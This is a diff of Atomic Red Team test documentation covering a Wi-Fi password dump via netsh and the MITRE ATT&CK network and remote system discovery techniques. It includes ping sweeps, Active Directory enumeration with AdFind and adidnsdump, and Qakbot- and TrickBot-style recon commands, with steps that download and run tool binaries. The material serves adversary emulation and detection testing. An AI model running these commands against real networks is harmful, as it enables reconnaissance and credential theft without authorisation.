## Atomic Test #1 - Enumerate Stored Wi-Fi Profiles And Passwords via netsh
Upon successful execution, information about previously connected Wi-Fi networks will be displayed with their corresponding key (if present).
**Supported Platforms:** Windows
**auto_generated_guid:** `53cf1903-0fa7-4177-ab14-f358ae809eec`
#### Attack Commands: Run with `command_prompt`!
**auto_generated_guid:** 53cf1903-0fa7-4177-ab14-f358ae809eec
#### Attack Commands: Run with `command_prompt`!
```cmd
netsh wlan show profile * key=clear
```
<br/>
atomics/T1016/T1016.md
+187 -76
View File
@@ -1,38 +1,55 @@
# T1016 - System Network Configuration Discovery
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1016)
<blockquote>
## Description from ATT&CK
Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).
> Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).
>
> Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes (e.g. <code>show ip route</code>, <code>show ip interface</code>).(Citation: US-CERT-TA18-106A)(Citation: Mandiant APT41 Global Intrusion ) On ESXi, adversaries may leverage esxcli to gather network configuration information. For example, the command `esxcli network nic list` will retrieve the MAC address, while `esxcli network ip interface ipv4 get` will retrieve the local IPv4 address.(Citation: Trellix Rnasomhouse 2024)
>
> Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next.
Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes (e.g. <code>show ip route</code>, <code>show ip interface</code>).(Citation: US-CERT-TA18-106A)(Citation: Mandiant APT41 Global Intrusion ) On ESXi, adversaries may leverage esxcli to gather network configuration information. For example, the command `esxcli network nic list` will retrieve the MAC address, while `esxcli network ip interface ipv4 get` will retrieve the local IPv4 address.(Citation: Trellix Rnasomhouse 2024)
[Source](https://attack.mitre.org/techniques/T1016)
Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next.
</blockquote>
## Atomic Tests
- [Atomic Test #1: System Network Configuration Discovery on Windows](#atomic-test-1-system-network-configuration-discovery-on-windows)
- [Atomic Test #2: List Windows Firewall Rules](#atomic-test-2-list-windows-firewall-rules)
- [Atomic Test #3: System Network Configuration Discovery](#atomic-test-3-system-network-configuration-discovery)
- [Atomic Test #4: System Network Configuration Discovery (TrickBot Style)](#atomic-test-4-system-network-configuration-discovery-trickbot-style)
- [Atomic Test #5: List Open Egress Ports](#atomic-test-5-list-open-egress-ports)
- [Atomic Test #6: Adfind - Enumerate Active Directory Subnet Objects](#atomic-test-6-adfind---enumerate-active-directory-subnet-objects)
- [Atomic Test #7: Qakbot Recon](#atomic-test-7-qakbot-recon)
- [Atomic Test #8: List macOS Firewall Rules](#atomic-test-8-list-macos-firewall-rules)
- [Atomic Test #9: DNS Server Discovery Using nslookup](#atomic-test-9-dns-server-discovery-using-nslookup)
- [Atomic Test #1 - System Network Configuration Discovery on Windows](#atomic-test-1---system-network-configuration-discovery-on-windows)
### Atomic Test #1: System Network Configuration Discovery on Windows
- [Atomic Test #2 - List Windows Firewall Rules](#atomic-test-2---list-windows-firewall-rules)
- [Atomic Test #3 - System Network Configuration Discovery](#atomic-test-3---system-network-configuration-discovery)
- [Atomic Test #4 - System Network Configuration Discovery (TrickBot Style)](#atomic-test-4---system-network-configuration-discovery-trickbot-style)
- [Atomic Test #5 - List Open Egress Ports](#atomic-test-5---list-open-egress-ports)
- [Atomic Test #6 - Adfind - Enumerate Active Directory Subnet Objects](#atomic-test-6---adfind---enumerate-active-directory-subnet-objects)
- [Atomic Test #7 - Qakbot Recon](#atomic-test-7---qakbot-recon)
- [Atomic Test #8 - List macOS Firewall Rules](#atomic-test-8---list-macos-firewall-rules)
- [Atomic Test #9 - DNS Server Discovery Using nslookup](#atomic-test-9---dns-server-discovery-using-nslookup)
<br/>
## Atomic Test #1 - System Network Configuration Discovery on Windows
Identify network configuration information
Upon successful execution, cmd.exe will spawn multiple commands to list network configuration settings. Output will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** `970ab6a1-0157-4f3f-9a73-ec4166754b23`
#### Attack Commands: Run with `command_prompt`!
**auto_generated_guid:** 970ab6a1-0157-4f3f-9a73-ec4166754b23
#### Attack Commands: Run with `command_prompt`!
```cmd
ipconfig /all
@@ -42,32 +59,60 @@ nbtstat -n
net config
```
### Atomic Test #2: List Windows Firewall Rules
<br/>
<br/>
## Atomic Test #2 - List Windows Firewall Rules
Enumerates Windows Firewall Rules using netsh.
Upon successful execution, cmd.exe will spawn netsh.exe to list firewall rules. Output will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** `038263cb-00f4-4b0a-98ae-0696c67e1752`
#### Attack Commands: Run with `command_prompt`!
**auto_generated_guid:** 038263cb-00f4-4b0a-98ae-0696c67e1752
#### Attack Commands: Run with `command_prompt`!
```cmd
netsh advfirewall firewall show rule name=all
```
### Atomic Test #3: System Network Configuration Discovery
<br/>
<br/>
## Atomic Test #3 - System Network Configuration Discovery
Identify network configuration information.
Upon successful execution, sh will spawn multiple commands and output will be via stdout.
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** `c141bbdb-7fca-4254-9fd6-f47e79447e17`
#### Attack Commands: Run with `sh`!
**auto_generated_guid:** c141bbdb-7fca-4254-9fd6-f47e79447e17
#### Attack Commands: Run with `sh`!
```sh
if [ "$(uname)" = 'FreeBSD' ]; then cmd="netstat -Sp tcp"; else cmd="netstat -ant"; fi;
@@ -78,33 +123,42 @@ if [ -x "$(command -v netstat)" ]; then $cmd | awk '{print $NF}' | grep -v '[[:l
```
#### Dependencies: Run with `sh`!
#### Dependencies: Run with `sh`!
##### Description: Check if arp command exists on the machine
###### Check Prereq Commands
##### Check Prereq Commands:
```sh
if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; fi;
```
###### Get Prereq Commands
##### Get Prereq Commands:
```sh
(which yum && yum -y install net-tools)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y net-tools)
```
### Atomic Test #4: System Network Configuration Discovery (TrickBot Style)
<br/>
<br/>
## Atomic Test #4 - System Network Configuration Discovery (TrickBot Style)
Identify network configuration information as seen by Trickbot and described here https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/
Upon successful execution, cmd.exe will spawn `ipconfig /all`, `net config workstation`, `net view /all /domain`, `nltest /domain_trusts`. Output will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** `dafaf052-5508-402d-bf77-51e0700c02e2`
#### Attack Commands: Run with `command_prompt`!
**auto_generated_guid:** dafaf052-5508-402d-bf77-51e0700c02e2
#### Attack Commands: Run with `command_prompt`!
```cmd
ipconfig /all
@@ -113,8 +167,15 @@ net view /all /domain
nltest /domain_trusts
```
### Atomic Test #5: List Open Egress Ports
<br/>
<br/>
## Atomic Test #5 - List Open Egress Ports
This is to test for what ports are open outbound. The technique used was taken from the following blog:
https://www.blackhillsinfosec.com/poking-holes-in-the-firewall-egress-testing-with-allports-exposed/
@@ -122,17 +183,23 @@ Upon successful execution, powershell will read top-128.txt (ports) and contact
**Supported Platforms:** Windows
**auto_generated_guid:** `4b467538-f102-491d-ace7-ed487b853bf5`
#### Inputs
**auto_generated_guid:** 4b467538-f102-491d-ace7-ed487b853bf5
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path of file to write port scan results | path | $env:USERPROFILE&#92;Desktop&#92;open-ports.txt|
| portfile_url | URL to top-128.txt | url | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1016/src/top-128.txt|
| port_file | The path to a text file containing ports to be scanned, one port per line. The default list uses the top 128 ports as defined by Nmap. | path | PathToAtomicsFolder&#92;T1016&#92;src&#92;top-128.txt|
#### Attack Commands: Run with `powershell`!
#### Attack Commands: Run with `powershell`!
```powershell
$ports = Get-content "#{port_file}"
@@ -163,108 +230,125 @@ $results | Out-File -Encoding ASCII -append $file
Write-Host $results
```
#### Cleanup Commands
#### Cleanup Commands:
```powershell
Remove-Item -ErrorAction ignore "#{output_file}"
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: Test requires #{port_file} to exist
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Test-Path "#{port_file}") {exit 0} else {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path "#{port_file}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "#{portfile_url}" -OutFile "#{port_file}"
```
### Atomic Test #6: Adfind - Enumerate Active Directory Subnet Objects
<br/>
<br/>
## Atomic Test #6 - Adfind - Enumerate Active Directory Subnet Objects
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Subnet Objects
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
**Supported Platforms:** Windows
**auto_generated_guid:** `9bb45dd7-c466-4f93-83a1-be30e56033ee`
#### Inputs
**auto_generated_guid:** 9bb45dd7-c466-4f93-83a1-be30e56033ee
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| optional_args | Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces. | string | |
#### Attack Commands: Run with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```cmd
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=subnet) #{optional_args}
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
```
### Atomic Test #7: Qakbot Recon
<br/>
<br/>
## Atomic Test #7 - Qakbot Recon
A list of commands known to be performed by Qakbot for recon purposes
**Supported Platforms:** Windows
**auto_generated_guid:** `121de5c6-5818-4868-b8a7-8fd07c455c1b`
#### Inputs
**auto_generated_guid:** 121de5c6-5818-4868-b8a7-8fd07c455c1b
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| recon_commands | File that houses list of commands to be executed | path | PathToAtomicsFolder&#92;T1016&#92;src&#92;qakbot.bat|
#### Attack Commands: Run with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```cmd
"#{recon_commands}"
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: File to copy must exist on disk at specified location (#{recon_commands})
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Test-Path "#{recon_commands}") {exit 0} else {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path "#{recon_commands}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1016/src/qakbot.bat" -OutFile "#{recon_commands}"
```
### Atomic Test #8: List macOS Firewall Rules
<br/>
<br/>
## Atomic Test #8 - List macOS Firewall Rules
"This will test if the macOS firewall is enabled and/or show what rules are configured. Must be run with elevated privileges. Upon successful execution, these commands will output various information about the firewall configuration, including status and specific port/protocol blocks or allows.
Using `defaults`, additional arguments can be added to see filtered details, such as `globalstate` for global configuration (\"Is it on or off?\"), `firewall` for common application allow rules, and `explicitauths` for specific rules configured by the user.
@@ -273,27 +357,54 @@ Using `socketfilterfw`, flags such as --getglobalstate or --listapps can be used
**Supported Platforms:** macOS
**auto_generated_guid:** `ff1d8c25-2aa4-4f18-a425-fede4a41ee88`
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
**auto_generated_guid:** ff1d8c25-2aa4-4f18-a425-fede4a41ee88
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```bash
sudo defaults read /Library/Preferences/com.apple.alf
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate
```
### Atomic Test #9: DNS Server Discovery Using nslookup
<br/>
<br/>
## Atomic Test #9 - DNS Server Discovery Using nslookup
Identify System domain dns controller on an endpoint using nslookup ldap query. This tool is being abused by qakbot malware to gather information on the domain
controller of the targeted or compromised host. reference https://securelist.com/qakbot-technical-analysis/103931/
**Supported Platforms:** Windows
**auto_generated_guid:** `34557863-344a-468f-808b-a1bfb89b4fa9`
#### Attack Commands: Run with `command_prompt`!
**auto_generated_guid:** 34557863-344a-468f-808b-a1bfb89b4fa9
#### Attack Commands: Run with `command_prompt`!
```cmd
nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.%USERDNSDOMAIN%
```
<br/>
atomics/T1018/T1018.md
+449 -181
View File
@@ -1,203 +1,324 @@
# T1018 - Remote System Discovery
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1018)
<blockquote>
## Description from ATT&CK
Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097), <code>net view</code> using [Net](https://attack.mitre.org/software/S0039), or, on ESXi servers, `esxcli network diag ping`.
> Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097), <code>net view</code> using [Net](https://attack.mitre.org/software/S0039), or, on ESXi servers, `esxcli network diag ping`.
>
> Adversaries may also analyze data from local host files (ex: <code>C:\Windows\System32\Drivers\etc\hosts</code> or <code>/etc/hosts</code>) or other passive means (such as local [Arp](https://attack.mitre.org/software/S0099) cache entries) in order to discover the presence of remote systems in an environment.
>
> Adversaries may also target discovery of network infrastructure as well as leverage [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands on network devices to gather detailed information about systems within a network (e.g. <code>show cdp neighbors</code>, <code>show arp</code>).(Citation: US-CERT-TA18-106A)(Citation: CISA AR21-126A FIVEHANDS May 2021)
Adversaries may also analyze data from local host files (ex: <code>C:\Windows\System32\Drivers\etc\hosts</code> or <code>/etc/hosts</code>) or other passive means (such as local [Arp](https://attack.mitre.org/software/S0099) cache entries) in order to discover the presence of remote systems in an environment.
[Source](https://attack.mitre.org/techniques/T1018)
Adversaries may also target discovery of network infrastructure as well as leverage [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands on network devices to gather detailed information about systems within a network (e.g. <code>show cdp neighbors</code>, <code>show arp</code>).(Citation: US-CERT-TA18-106A)(Citation: CISA AR21-126A FIVEHANDS May 2021)
</blockquote>
## Atomic Tests
- [Atomic Test #1: Remote System Discovery - net](#atomic-test-1-remote-system-discovery---net)
- [Atomic Test #2: Remote System Discovery - net group Domain Computers](#atomic-test-2-remote-system-discovery---net-group-domain-computers)
- [Atomic Test #3: Remote System Discovery - nltest](#atomic-test-3-remote-system-discovery---nltest)
- [Atomic Test #4: Remote System Discovery - ping sweep](#atomic-test-4-remote-system-discovery---ping-sweep)
- [Atomic Test #5: Remote System Discovery - arp](#atomic-test-5-remote-system-discovery---arp)
- [Atomic Test #6: Remote System Discovery - arp nix](#atomic-test-6-remote-system-discovery---arp-nix)
- [Atomic Test #7: Remote System Discovery - sweep](#atomic-test-7-remote-system-discovery---sweep)
- [Atomic Test #8: Remote System Discovery - nslookup](#atomic-test-8-remote-system-discovery---nslookup)
- [Atomic Test #9: Remote System Discovery - adidnsdump](#atomic-test-9-remote-system-discovery---adidnsdump)
- [Atomic Test #10: Adfind - Enumerate Active Directory Computer Objects](#atomic-test-10-adfind---enumerate-active-directory-computer-objects)
- [Atomic Test #11: Adfind - Enumerate Active Directory Domain Controller Objects](#atomic-test-11-adfind---enumerate-active-directory-domain-controller-objects)
- [Atomic Test #12: Remote System Discovery - ip neighbour](#atomic-test-12-remote-system-discovery---ip-neighbour)
- [Atomic Test #13: Remote System Discovery - ip route](#atomic-test-13-remote-system-discovery---ip-route)
- [Atomic Test #14: Remote System Discovery - netstat](#atomic-test-14-remote-system-discovery---netstat)
- [Atomic Test #15: Remote System Discovery - ip tcp_metrics](#atomic-test-15-remote-system-discovery---ip-tcp_metrics)
- [Atomic Test #16: Enumerate domain computers within Active Directory using DirectorySearcher](#atomic-test-16-enumerate-domain-computers-within-active-directory-using-directorysearcher)
- [Atomic Test #17: Enumerate Active Directory Computers with Get-AdComputer](#atomic-test-17-enumerate-active-directory-computers-with-get-adcomputer)
- [Atomic Test #18: Enumerate Active Directory Computers with ADSISearcher](#atomic-test-18-enumerate-active-directory-computers-with-adsisearcher)
- [Atomic Test #19: Get-DomainController with PowerView](#atomic-test-19-get-domaincontroller-with-powerview)
- [Atomic Test #20: Get-WmiObject to Enumerate Domain Controllers](#atomic-test-20-get-wmiobject-to-enumerate-domain-controllers)
- [Atomic Test #21: Remote System Discovery - net group Domain Controller](#atomic-test-21-remote-system-discovery---net-group-domain-controller)
- [Atomic Test #22: Enumerate Remote Hosts with Netscan](#atomic-test-22-enumerate-remote-hosts-with-netscan)
- [Atomic Test #1 - Remote System Discovery - net](#atomic-test-1---remote-system-discovery---net)
### Atomic Test #1: Remote System Discovery - net
- [Atomic Test #2 - Remote System Discovery - net group Domain Computers](#atomic-test-2---remote-system-discovery---net-group-domain-computers)
- [Atomic Test #3 - Remote System Discovery - nltest](#atomic-test-3---remote-system-discovery---nltest)
- [Atomic Test #4 - Remote System Discovery - ping sweep](#atomic-test-4---remote-system-discovery---ping-sweep)
- [Atomic Test #5 - Remote System Discovery - arp](#atomic-test-5---remote-system-discovery---arp)
- [Atomic Test #6 - Remote System Discovery - arp nix](#atomic-test-6---remote-system-discovery---arp-nix)
- [Atomic Test #7 - Remote System Discovery - sweep](#atomic-test-7---remote-system-discovery---sweep)
- [Atomic Test #8 - Remote System Discovery - nslookup](#atomic-test-8---remote-system-discovery---nslookup)
- [Atomic Test #9 - Remote System Discovery - adidnsdump](#atomic-test-9---remote-system-discovery---adidnsdump)
- [Atomic Test #10 - Adfind - Enumerate Active Directory Computer Objects](#atomic-test-10---adfind---enumerate-active-directory-computer-objects)
- [Atomic Test #11 - Adfind - Enumerate Active Directory Domain Controller Objects](#atomic-test-11---adfind---enumerate-active-directory-domain-controller-objects)
- [Atomic Test #12 - Remote System Discovery - ip neighbour](#atomic-test-12---remote-system-discovery---ip-neighbour)
- [Atomic Test #13 - Remote System Discovery - ip route](#atomic-test-13---remote-system-discovery---ip-route)
- [Atomic Test #14 - Remote System Discovery - netstat](#atomic-test-14---remote-system-discovery---netstat)
- [Atomic Test #15 - Remote System Discovery - ip tcp_metrics](#atomic-test-15---remote-system-discovery---ip-tcp_metrics)
- [Atomic Test #16 - Enumerate domain computers within Active Directory using DirectorySearcher](#atomic-test-16---enumerate-domain-computers-within-active-directory-using-directorysearcher)
- [Atomic Test #17 - Enumerate Active Directory Computers with Get-AdComputer](#atomic-test-17---enumerate-active-directory-computers-with-get-adcomputer)
- [Atomic Test #18 - Enumerate Active Directory Computers with ADSISearcher](#atomic-test-18---enumerate-active-directory-computers-with-adsisearcher)
- [Atomic Test #19 - Get-DomainController with PowerView](#atomic-test-19---get-domaincontroller-with-powerview)
- [Atomic Test #20 - Get-WmiObject to Enumerate Domain Controllers](#atomic-test-20---get-wmiobject-to-enumerate-domain-controllers)
- [Atomic Test #21 - Remote System Discovery - net group Domain Controller](#atomic-test-21---remote-system-discovery---net-group-domain-controller)
- [Atomic Test #22 - Enumerate Remote Hosts with Netscan](#atomic-test-22---enumerate-remote-hosts-with-netscan)
<br/>
## Atomic Test #1 - Remote System Discovery - net
Identify remote systems with net.exe.
Upon successful execution, cmd.exe will execute `net.exe view` and display results of local systems on the network that have file and print sharing enabled.
**Supported Platforms:** Windows
**auto_generated_guid:** `85321a9c-897f-4a60-9f20-29788e50bccd`
#### Attack Commands: Run with `command_prompt`!
**auto_generated_guid:** 85321a9c-897f-4a60-9f20-29788e50bccd
#### Attack Commands: Run with `command_prompt`!
```cmd
net view /domain
net view
```
### Atomic Test #2: Remote System Discovery - net group Domain Computers
<br/>
<br/>
## Atomic Test #2 - Remote System Discovery - net group Domain Computers
Identify remote systems with net.exe querying the Active Directory Domain Computers group.
Upon successful execution, cmd.exe will execute cmd.exe against Active Directory to list the "Domain Computers" group. Output will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** `f1bf6c8f-9016-4edf-aff9-80b65f5d711f`
#### Attack Commands: Run with `command_prompt`!
**auto_generated_guid:** f1bf6c8f-9016-4edf-aff9-80b65f5d711f
#### Attack Commands: Run with `command_prompt`!
```cmd
net group "Domain Computers" /domain
```
### Atomic Test #3: Remote System Discovery - nltest
<br/>
<br/>
## Atomic Test #3 - Remote System Discovery - nltest
Identify domain controllers for specified domain.
Upon successful execution, cmd.exe will execute nltest.exe against a target domain to retrieve a list of domain controllers. Output will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** `52ab5108-3f6f-42fb-8ba3-73bc054f22c8`
#### Inputs
**auto_generated_guid:** 52ab5108-3f6f-42fb-8ba3-73bc054f22c8
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_domain | Domain to query for domain controllers | string | %userdnsdomain%|
#### Attack Commands: Run with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```cmd
nltest.exe /dclist:#{target_domain}
```
### Atomic Test #4: Remote System Discovery - ping sweep
<br/>
<br/>
## Atomic Test #4 - Remote System Discovery - ping sweep
Identify remote systems via ping sweep.
Upon successful execution, cmd.exe will perform a for loop against the 192.168.1.1/24 network. Output will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** `6db1f57f-d1d5-4223-8a66-55c9c65a9592`
#### Inputs
**auto_generated_guid:** 6db1f57f-d1d5-4223-8a66-55c9c65a9592
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| start_host | Last octet starting value for ping sweep. | string | 1|
| stop_host | Last octet ending value for ping sweep. | string | 254|
| subnet | Subnet used for ping sweep. | string | 192.168.1|
#### Attack Commands: Run with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```cmd
for /l %i in (#{start_host},1,#{stop_host}) do ping -n 1 -w 100 #{subnet}.%i
```
### Atomic Test #5: Remote System Discovery - arp
<br/>
<br/>
## Atomic Test #5 - Remote System Discovery - arp
Identify remote systems via arp.
Upon successful execution, cmd.exe will execute arp to list out the arp cache. Output will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** `2d5a61f5-0447-4be4-944a-1f8530ed6574`
#### Attack Commands: Run with `command_prompt`!
**auto_generated_guid:** 2d5a61f5-0447-4be4-944a-1f8530ed6574
#### Attack Commands: Run with `command_prompt`!
```cmd
arp -a
```
### Atomic Test #6: Remote System Discovery - arp nix
<br/>
<br/>
## Atomic Test #6 - Remote System Discovery - arp nix
Identify remote systems via arp.
Upon successful execution, sh will execute arp to list out the arp cache. Output will be via stdout.
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** `acb6b1ff-e2ad-4d64-806c-6c35fe73b951`
#### Attack Commands: Run with `sh`!
**auto_generated_guid:** acb6b1ff-e2ad-4d64-806c-6c35fe73b951
#### Attack Commands: Run with `sh`!
```sh
arp -a | grep -v '^?'
```
#### Dependencies: Run with `sh`!
#### Dependencies: Run with `sh`!
##### Description: Check if arp command exists on the machine
###### Check Prereq Commands
##### Check Prereq Commands:
```sh
if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; fi;
```
###### Get Prereq Commands
##### Get Prereq Commands:
```sh
(which yum && yum -y install net-tools)||(which apt-get && apt-get install -y net-tools)
```
### Atomic Test #7: Remote System Discovery - sweep
<br/>
<br/>
## Atomic Test #7 - Remote System Discovery - sweep
Identify remote systems via ping sweep.
Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active.
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** `96db2632-8417-4dbb-b8bb-a8b92ba391de`
#### Inputs
**auto_generated_guid:** 96db2632-8417-4dbb-b8bb-a8b92ba391de
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| start_host | Subnet used for ping sweep. | string | 1|
| stop_host | Subnet used for ping sweep. | string | 254|
| subnet | Subnet used for ping sweep. | string | 192.168.1|
#### Attack Commands: Run with `sh`!
#### Attack Commands: Run with `sh`!
```sh
for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 #{subnet}.$ip; [ $? -eq 0 ] && echo "#{subnet}.$ip UP" || : ; done
```
### Atomic Test #8: Remote System Discovery - nslookup
<br/>
<br/>
## Atomic Test #8 - Remote System Discovery - nslookup
Powershell script that runs nslookup on cmd.exe against the local /24 network of the first network adaptor listed in ipconfig.
Upon successful execution, powershell will identify the ip range (via ipconfig) and perform a for loop and execute nslookup against that IP range. Output will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** `baa01aaa-5e13-45ec-8a0d-e46c93c9760f`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
**auto_generated_guid:** baa01aaa-5e13-45ec-8a0d-e46c93c9760f
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
$localip = ((ipconfig | findstr [0-9].\.)[0]).Split()[-1]
@@ -208,18 +329,29 @@ $thirdOctet = $pieces[2]
foreach ($ip in 1..255 | % { "$firstOctet.$secondOctet.$thirdOctet.$_" } ) {cmd.exe /c nslookup $ip}
```
### Atomic Test #9: Remote System Discovery - adidnsdump
<br/>
<br/>
## Atomic Test #9 - Remote System Discovery - adidnsdump
This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks
Python 3 and adidnsdump must be installed, use the get_prereq_command's to meet the prerequisites for this test.
Successful execution of this test will list dns zones in the terminal.
**Supported Platforms:** Windows
**auto_generated_guid:** `95e19466-469e-4316-86d2-1dc401b5a959`
#### Inputs
**auto_generated_guid:** 95e19466-469e-4316-86d2-1dc401b5a959
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | username including domain. | string | domain&#92;user|
@@ -227,246 +359,297 @@ Successful execution of this test will list dns zones in the terminal.
| host_name | hostname or ip address to connect to. | string | 192.168.1.1|
| venv_path | Path to the folder for the tactics venv | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;venv_t1018|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
"#{venv_path}\Scripts\adidnsdump" -u #{user_name} -p #{acct_pass} --print-zones #{host_name}
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: Computer must have python 3 installed
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
```
##### Description: Computer must have venv configured at #{venv_path}
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Test-Path -Path "#{venv_path}" ) { exit 0 } else { exit 1 }
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
py -m venv "#{venv_path}"
```
##### Description: adidnsdump must be installed
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Get-Command "#{venv_path}\Scripts\adidnsdump" -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir adidnsdump 2>&1 | Out-Null
```
### Atomic Test #10: Adfind - Enumerate Active Directory Computer Objects
<br/>
<br/>
## Atomic Test #10 - Adfind - Enumerate Active Directory Computer Objects
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Computer Objects
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
**Supported Platforms:** Windows
